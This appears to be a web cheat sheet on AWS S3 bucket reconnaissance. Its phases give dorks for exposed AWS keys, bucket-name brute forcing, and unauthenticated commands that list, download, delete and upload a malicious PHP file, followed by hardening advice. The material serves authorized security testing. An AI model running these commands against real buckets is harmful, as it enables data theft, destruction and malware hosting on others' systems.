AWS S3 Buckets

AWS S3 bucket reconnaissance, enumeration, and misconfiguration testing techniques.

16 Categories40+ CommandsCopy Ready
Phase 1

Understanding AWS S3 Buckets

1What is S3 Bucket Reconnaissance?
S3 bucket reconnaissance = identifying publicly accessible or misconfigured AWS S3 buckets
2Purpose of S3 reconnaissance
Helps organizations secure their cloud storage by finding exposed data
3Test access to a bucket with AWS CLI
AWS CLI: aws s3 ls (requires configured credentials)
4Check if bucket exists and is accessible (HTTP headers)
curl -I https://target.s3.amazonaws.com
Phase 2

Manual Methods for Identifying S3 Buckets

1Test in browser URL bar - basic bucket URL format
https://target.s3.amazonaws.com
2Alternative bucket URL format (older style)
https://s3.amazonaws.com/target
3S3 external endpoint format
https://target.s3-external-1.amazonaws.com
4Dual-stack endpoint (IPv4 + IPv6)
https://target.s3.dualstack.us-east-1.amazonaws.com
Phase 3

Google Dorking for AWS S3 Buckets

1#1 Find S3 buckets related to target domain
site:s3.amazonaws.com "target.com"
2#2 Wildcard search for all subdomain buckets
site:*.s3.amazonaws.com "target.com"
3#3 Search external S3 endpoints
site:s3-external-1.amazonaws.com "target.com"
4#4 Find buckets with directory listing enabled
site:s3.amazonaws.com intitle:"index of"
5#5 Search for buckets containing sensitive keywords
site:s3.amazonaws.com "target.com" "bucket" OR "aws_access_key" OR "secret"
6#6 Broad search across all Amazon AWS domains
site:amazonaws.com inurl:s3.amazonaws.com
Phase 4

Automating Google Dorking with DorkEye

1DorkEye automates Google dorking for faster recon
https://github.com/BullsEye0/dorks-eye
2Run DorkEye with target domain and output file
python3 dorkeye.py -d target.com -o s3-results.txt
3Filter results for S3 bucket URLs
cat s3-results.txt | grep -i s3.amazonaws.com
Phase 5

Using S3Misconfig for Fast Bucket Enumeration

1S3Misconfig scans for buckets with listing enabled
https://github.com/Atharv834/S3BucketMisconf
2Scan list of bucket URLs and generate HTML report
python3 s3misconfig.py -l bucket-list.txt -o results.html
3Extract open buckets from HTML report
cat results.html | grep -i 'open bucket|listing enabled'
Phase 6

Finding S3 Buckets with HTTPX and Nuclei

1#1 Use Subfinder + HTTPX to find S3 in page titles
subfinder -d target.com -all -silent | httpx-toolkit -sc -title | grep -i 'amazon s3|s3.amazonaws'
2#2 Scan subdomains with Nuclei S3 detection template
subfinder -d target.com -all -silent | nuclei -t s3-detect.yaml -o s3-nuclei.txt
3#3 Filter Nuclei results for S3 findings
cat s3-nuclei.txt | grep -i 's3|bucket'
Phase 7

Extracting S3 URLs from JavaScript Files with java2s3

1Katana: Tool to crawl and extract URLs from JS files
https://github.com/projectdiscovery/katana
2#1 Crawl target and extract JS file URLs
katana -u https://target.com/ -d 5 -jc | grep '\.js$' | tee alljs.txt
3#2 Extract S3 URLs from all JS files
cat alljs.txt | xargs -I {} curl -s {} | grep -oE 'https?://[^\"]*\.s3\.amazonaws\.com[^\"]*' | sort -u
4java2s3: Alternative tool for extracting S3 URLs from JS
https://github.com/mexploit30/java2s3
Phase 8

Brute-Forcing S3 Bucket Names with LazyS3

1LazyS3: Brute force tool for AWS S3 bucket names
https://github.com/nahamsec/lazys3
2Basic LazyS3 run with target domain
ruby lazys3.rb target.com
3Use custom wordlist with LazyS3
ruby lazys3.rb target.com -w custom-wordlist.txt
Phase 9

Using CeWL + S3Scanner to find open buckets

1#1 Generate custom wordlist from target website
cewl https://target.com/ -d 3 -m 5 -w cewl-words.txt
2#2 Combine CeWL output with generic wordlist
cat cewl-words.txt rockyou.txt > final-wordlist.txt
3S3Scanner: Identify valid/invalid S3 buckets with permission checks
https://github.com/sa7mon/S3Scanner
4Scan wordlist and enumerate bucket permissions
s3scanner -bucket-file final-wordlist.txt -enumerate -threads 10
Phase 10

Extracting S3 Buckets from GitHub Repositories

1#1 Search GitHub repos for amazonaws references
org:target "amazonaws"
2#2 Find exposed AWS access keys in repos
org:target "aws_access_key"
3#3 Search for various AWS secret key formats
org:target "aws_secret_key" OR "aws_secret" OR "aws_key"
4#4 Find S3 bucket references in code
org:target "S3_BUCKET"
Phase 11

Websites for Public S3 Bucket Discovery

1#1 GrayHatWarfare: Search public S3 buckets by keyword
https://buckets.grayhatwarfare.com/
2#2 OSINT.sh: Another public S3 bucket search engine
https://osint.sh/buckets/
3#3 Nuclei template for S3 detection (reference)
https://github.com/coffinxp/nuclei-templates/blob/main/http/technologies/s3-detect.yaml
Phase 12

Finding Hidden S3 URLs with Extensions

1S3BucketList Chrome extension for finding S3 URLs
https://chromewebstore.google.com/detail/s3bucketlist/anngjobjhcbancaaogmlcffohpmcniki
2Find S3 URLs with sensitive file extensions
cat js-files.txt | grep -oE 'https?://[^\"]*\.s3\.amazonaws\.com/[^\"]*\.(zip|tar|gz|sql|env|log|key|pem|bak)' | sort -u
Phase 13

AWS S3 Bucket Listing & File Management

1#1 List files in bucket (no credentials needed if public)
aws s3 ls s3://bucket-name --no-sign-request
2#2 Recursively list all files in human-readable format
aws s3 ls s3://bucket-name --recursive --human-readable --no-sign-request
3#3 Filter for potentially sensitive files
aws s3 ls s3://bucket-name --no-sign-request | grep -E '\.(env|pem|key|json|yml|yaml|config|php|ini|sql|db|log|backup|bak|zip|rar|7z|tar|gz)'
4#4 Download a specific file from bucket
aws s3 cp s3://bucket-name/file.txt ./ --no-sign-request
5#5 Download entire bucket recursively
aws s3 cp s3://bucket-name/ ./ --recursive --no-sign-request
6#6 Delete file (if WRITE permission exists - for authorized testing!)
aws s3 rm s3://bucket-name/file.txt --no-sign-request
Phase 14

Exploiting Misconfigured Buckets

1Risk: Data exfiltration, sensitive info disclosure
Public READ = Anyone can list and download files
2Risk: Malware hosting, defacement, data poisoning
Public WRITE = Anyone can upload files to bucket
3Risk: Complete bucket takeover, data destruction possible
Public FULL_CONTROL = Read + Write + Delete permissions
4EXAMPLE: Upload malicious file if WRITE permission exists
aws s3 cp malicious-file.php s3://bucket-name/ --no-sign-request
Phase 15

Securing S3 Buckets

1Use IAM policies to strictly control who can access the bucket
Enable bucket policies and restrict access
2Avoid using public-read or public-read-write ACLs
Disable public ACLs unless necessary
3Enable logging to detect unauthorized access attempts
Monitor logs using AWS CloudTrail
4Use S3 server-side encryption or client-side encryption
Implement encryption for sensitive data
5Enable S3 Block Public Access to prevent accidental exposure
Use S3 Block Public Access at account level
Tools

Tools & Resources